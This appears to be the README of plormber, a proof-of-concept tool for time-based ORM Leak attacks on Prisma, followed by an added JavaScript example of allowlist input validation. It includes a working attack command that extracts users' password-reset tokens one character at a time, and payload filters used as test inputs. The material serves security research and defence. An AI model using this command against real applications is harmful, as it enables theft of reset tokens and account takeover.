elttam/plormber

plORMber

A proof-of-concept tool for exploiting ORM Leak time-based vulnerabilities. The features of this tool are currently very limited, but it can be used to quickly implement a time-based ORM Leak attack.

See the accompanying blog article for an overview of how plormber works.

Feel free to fork this project for further development as long as you acknowledge elttam as the original creators.


Features

  • Time-based exploitation of Prisma
  • SDK for developing ORM leak exploits

Installation

Virtual environment install

# For installing to a virtual environment
python3 -m venv venv
source venv/bin/activate

# Install plormber
pip install .

Docker install

docker compose build

Usage

Virtual environment

plormber --help

Docker

docker compose run --rm plormber --help

Prisma Example

Prisma time-based attack with payloads as arguments

# Placeholders substituted by plormber on each request:
#   {PAYLOAD}       - the generated filter object inserted into the base query
#   {ORM_LEAK}      - the candidate prefix under test, extended one character at a time from --chars
#   {RANDOM_STRING} - a fresh random string for the contains payload
plormber prisma-contains \
    --chars '0123456789abcdef' \
    --base-query-json '{"query": {PAYLOAD}}' \
    --leak-query-json '{"createdBy": {"resetToken": {"startsWith": "{ORM_LEAK}"}}}' \
    --contains-payload-json '{"body": {"contains": "{RANDOM_STRING}"}}' \
    --verbose-stats \
    https://some.vuln.app/articles/time-based
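The example above only works when the application forwards a client-supplied JSON filter straight into a Prisma `where` clause, which lets the client add a relation traversal (createdBy.resetToken.startsWith) and the contains payload the tool pairs with it. The following is an added example, not code from plormber or from elttam, of the input-validation step that closes that gap on a hypothetical article endpoint: the vulnerable query builder beside a hardened one that rebuilds the filter from a field/operator allowlist. The field names, operator sets and length limit are assumptions for the illustration, and no Prisma client is needed to run it.

```javascript
// Added example (not part of plormber). Assumed vulnerable shape: an endpoint
// that did prisma.article.findMany({ where: req.body.query }) with no checks.

// Allowlist of fields a client may filter on and the operators permitted per
// field (assumed for this example). Relation fields such as createdBy and
// sensitive columns are simply absent, so they can never reach the ORM.
const ALLOWED_FILTERS = {
  title: new Set(['equals', 'contains']),
  published: new Set(['equals']),
};
const MAX_STRING_LENGTH = 200; // assumed bound on filter values

function isPlainObject(value) {
  return value !== null && typeof value === 'object' && !Array.isArray(value);
}

// Vulnerable shape: whatever the client sends becomes the Prisma `where`.
function buildArticleQueryUnsafe(userWhere) {
  return { where: userWhere };
}

// Hardened shape: rebuild the filter from scratch, keeping only known
// field/operator pairs with scalar values; everything else is rejected.
function sanitizeWhere(userWhere) {
  if (!isPlainObject(userWhere)) throw new Error('query must be a JSON object');
  const where = {};
  for (const [field, condition] of Object.entries(userWhere)) {
    const operators = ALLOWED_FILTERS[field];
    if (!operators) throw new Error(`filtering on "${field}" is not allowed`);
    if (!isPlainObject(condition)) throw new Error(`condition for "${field}" must be an object`);
    where[field] = {};
    for (const [op, value] of Object.entries(condition)) {
      if (!operators.has(op)) throw new Error(`operator "${op}" is not allowed on "${field}"`);
      if (typeof value === 'string') {
        if (value.length > MAX_STRING_LENGTH) throw new Error(`value for "${field}" is too long`);
      } else if (typeof value !== 'boolean') {
        throw new Error(`value for "${field}.${op}" must be a string or boolean`);
      }
      where[field][op] = value;
    }
  }
  return where;
}

function buildArticleQuery(userWhere) {
  return { where: sanitizeWhere(userWhere) };
}

// Returns null when a filter is accepted, otherwise the rejection reason.
function checkFilter(userWhere) {
  try {
    sanitizeWhere(userWhere);
    return null;
  } catch (err) {
    return err.message;
  }
}

// Constructed sample inputs mirroring the README's leak and contains payloads.
const LEAK_FILTER = { createdBy: { resetToken: { startsWith: 'a' } } };
const CONTAINS_FILTER = { body: { contains: 'xK9qL2' } };
const BENIGN_FILTER = { title: { contains: 'prisma' }, published: { equals: true } };

for (const filter of [LEAK_FILTER, CONTAINS_FILTER, BENIGN_FILTER]) {
  console.log(JSON.stringify(filter), '->', checkFilter(filter) ?? 'accepted');
}
```

The allowlist is deliberately a positive list: adding a blocklist for `startsWith` or for relation names leaves every other operator and relation exposed, whereas rejecting unknown field/operator pairs means a new Prisma operator or a new relation in the schema is closed by default. Logging the rejection reason on the server side also gives a cheap detection signal, since a legitimate client never sends filters on fields it was not offered.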

Custom plormber Attacks

See CUSTOM_ATTACKS.md for documentation about implementing custom plormber attacks.


Planned Future Features

  • More exploitation methods
  • Burp Suite plugin
